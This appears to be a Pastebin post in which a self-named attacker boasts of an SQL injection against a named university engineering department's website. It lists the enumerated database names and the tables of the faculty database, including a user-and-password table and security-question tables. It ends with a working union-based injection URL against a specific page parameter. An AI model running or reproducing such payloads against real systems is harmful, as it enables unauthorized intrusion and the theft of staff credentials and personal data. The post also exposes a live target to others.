Advertisement
Guest User

ece.miami.edu sql injection / QuisterTow

a guest
Mar 5th, 2013
229
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.47 KB | None | 0 0
  1. /*
  2. Target : ece.miami.edu [Electrical and computer engineering]
  3. Author : QuisterTow / twitter.com/quistertow
  4. Hour : 19:53
  5. Date : 5 march 2013
  6. */
  7. ============================
  8. Databases [+]
  9. bme
  10. cascm
  11. coediag
  12. db406973105
  13. db_transfer
  14. directory
  15. donors
  16. eaborgserver
  17. eaborgusers
  18. ece
  19. engineering_faculty -------[current database]
  20. engineering_research
  21. excel
  22. information_schema
  23. mysql
  24. preg_test
  25. registration
  26. test
  27. wordpress-coe
  28. =============================
  29. Tables[+] from engineering_faculty
  30.  
  31. Blank
  32. BlankIds
  33. PBMPRB
  34. PBMPRBC
  35. PBMPRM
  36. PJRJAERCP
  37. PJRJAERJA
  38. POWPAP
  39. monthrep
  40. repmonth
  41. search
  42. tb_department
  43. tb_employee_type
  44. tb_experience
  45. tb_experience_details
  46. tb_faculty
  47. tb_faculty_education
  48. tb_faculty_experience
  49. tb_faculty_goals
  50. tb_faculty_intr
  51. tb_faculty_professional
  52. tb_faculty_publication
  53. tb_faculty_security_question
  54. tb_faculty_service
  55. tb_faculty_teaching
  56. tb_faculty_wsycv
  57. tb_higher_education
  58. tb_interest_link
  59. tb_month
  60. tb_permission
  61. tb_professional
  62. tb_professional_details
  63. tb_publication
  64. tb_publication_details
  65. tb_security_question
  66. tb_service
  67. tb_staff
  68. tb_teaching
  69. tb_teaching_details
  70. tb_user_and_passw
  71. test
  72. usersdata
  73. view_faculty_publication
  74. ============================
  75.  
  76. /* Tables union based sintax */
  77. http://ece.miami.edu/people/indextest.php?id=113 and 1=2 union select group_concat(table_name),2,3,4,5,6,7 from information_schema.tables where table_schema=database()-- -
  78.  
  79. That's all
  80.  
  81. QuisterTow.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement